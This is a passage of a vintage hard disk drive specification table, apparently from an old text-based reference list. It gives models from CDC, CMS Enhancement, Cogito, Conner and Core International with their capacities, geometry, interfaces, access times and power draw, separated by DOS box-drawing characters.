ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN IV 94171-300 5.25 FULL 300.0MB 1365 5 9 VC SCSI RLL(2,7) Y 17mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN IV 94171-344 5.25 FULL 344.0MB 1549 5 9 VC SCSI RLL(2,7) Y 18mS 12.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN IV 94171-350 5.25 FULL 350.0MB 307.0MB 1549 5 9 VC SCSI RLL(ZBR) Y 17mS 12.0Mb 100K 30.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC WREN IV 94171-376 5.25 FULL 376.0MB 330.0MB 1549 5 9 VC SCSI RLL(ZBR) Y 18mS 12.0Mb 100K 30.0W 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F320AT-CA 5.25 FULL 320.0MB ESDI RLL(2,7) Y 15mS 10.0Mb 40K 29.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CMS ENHANCE. F70ESDI-T 5.25 FULL 73.0MB ESDI Y 30mS 10.0Mb 25K 30.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CMS ENHANCE. H330E1 PS Expr. 5.25 HALF 330.0MB 1780 54 4 7 VC ESDI RLL(2,7) Y 14mS 15.0Mb 150K 14.3W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CMS ENHANCE. H340E1 Expr. 5.25 HALF 340.0MB 1780 54 4 7 VC ESDI RLL(2,7) Y 14mS 15.0Mb 150K 14.3W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CMS ENHANCE. PSExpress 150 5.25 FULL 150.0MB ESDI Y 17mS 10.0Mb 40K 21.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CMS ENHANCE. PSExpress 320 5.25 FULL 320.0MB ESDI Y 15mS 10.0Mb 40K 29.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + COGITO CG-906 5.25 6.0MB 5.0MB 306 128 17 2 SM ST412 MFM 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + COGITO CG-912 5.25 12.0MB 11.0MB 306 128 17 4 SM ST412 MFM 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + COGITO PT-912 5.25 12.0MB 11.0MB 612 307 17 2 SM ST412 MFM 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + COGITO PT-925 5.25 25.0MB 21.0MB 612 307 17 4 SM ST412 MFM 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-2020 2.50 20.0MB VC SCSI RLL(2,7) Y + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-2024 KATO 2.50 1.0" 21.4MB 653 1 2 VC IDE-X,A RLL(2,7) 1700 Y 40mS 10.0Mb 40K 3.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-2034 PANCHO 2.50 0.8" 32.0MB VC IDE RLL(2,7) Y 19mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-2044 PANCHO 2.50 0.8" 42.0MB VC IDE RLL(2,7) Y 19mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-2064 PANCHO 2.50 0.8" 64.0MB VC IDE RLL(2,7) Y 19mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + þ + + + + + + + + + PAGE 8 + --SIZE-- -----CAPACITY---- PRE- S/ # RW HD INTER- RECORD TKS AVE XFER POWER + MANUFACTURER MODEL NUMBER WTH. HGT. UNFORMAT FORMATED CYLS COMP TK PL HD AC FACE METHOD IN. P? ACC RATE MTBF USED COMMENTS + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + CONNER CP-30080 3.50 1.0" 84.0MB VC SCSI RLL(2,7) Y + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-30100 HOPI 3.50 1.0" 120.0MB 1522 2 4 VC SCSI RLL(2,7) 1850 Y 19mS 12.0Mb 50K 3.8W 64K BUFFER + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-30104 HOPI 3.50 1.0" 120.0MB 1522 2 4 IDE(AT) RLL(2,7) 1850 19mS 12.0Mb 40K 3.8W 64K BUFFER + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-3020 3.50 1.0" 21.5MB 636 1 2 VC SCSI RLL(2,7) 1150 Y 29mS 10.0Mb 50K 4.2W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-3022 3.50 636 4 8 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-3024 3.50 1.0" 21.5MB 636 1 2 VC IDE(AT) RLL(2,7) 1150 Y 27mS 10.0Mb 50K 4.2W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-3040 3.50 1.0" 42.6MB 1047 41 1 2 VC SCSI RLL(2,7) 1400 Y 25mS 12.0Mb 50K 4.2W 8K BUFFER + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-3044 3.50 1.0" 42.9MB 1047 41 1 2 VC IDE(AT) RLL(2,7) 1400 Y 25mS 12.0Mb 50K 4.2W 8K BUFFER + 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ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-3184 3.50 HALF 80.0MB VC IDE(AT) RLL(2,7) Y 19mS 9.0Mb 32K BUFFER + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-3200F 3.50 HALF 212.6MB 1348 39 4 8 VC SCSI RLL(2,7) 1700 Y 16mS 12.0Mb 50K 6.0W 64K BUFFER + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-3204 3.50 HALF 209.7MB 1348 39 4 8 VC IDE(AT) RLL(2,7) Y 19mS 12.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-3204F 3.50 HALF 212.6MB 1366 4 8 IDE(AT) RLL(2,7) 1700 16mS 12.0Mb 20K 6.0W 64K BUFFER + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-340 3.50 HALF 42.9MB 788 2 4 VC SCSI RLL(2,7) 1000 Y 29mS 7.5Mb 20K 4.3W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-342 3.50 HALF 40.0MB 805 2 4 VC IDE(AT) RLL(2,7) Y 29mS 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-344 3.50 HALF 42.9MB 805 2 4 VC IDE(AT) RLL(2,7) 1000 Y 29mS 7.5Mb 20K 4.3W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-3500 3.50 HALF 510.0MB 6 VC SCSI RLL(2,7) Y 12mS 256K BUFFER + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-3504 3.50 HALF 510.0MB 6 VC IDE(AT) RLL(2,7) Y 12mS 256K BUFFER + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-4024 STUBBY 3.50 1.0" 21.8MB 627 1 2 IDE-X,A RLL(2,7) 1150 29mS 9.0Mb 40K 3.8W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CONNER CP-4044 STUBBY 3.50 1.0" 42.9MB 1104 1 2 IDE-X,A RLL(2,7) 1400 50mS 10.0Mb 40K 3.8W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. AT-150 5.25 FULL 156.0MB ESDI RLL(2,7) Y 16mS 10.0Mb 99K 25.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. AT-30 5.25 FULL 31.0MB 733 17 3 5 ST412 MFM 26mS 5.0Mb + 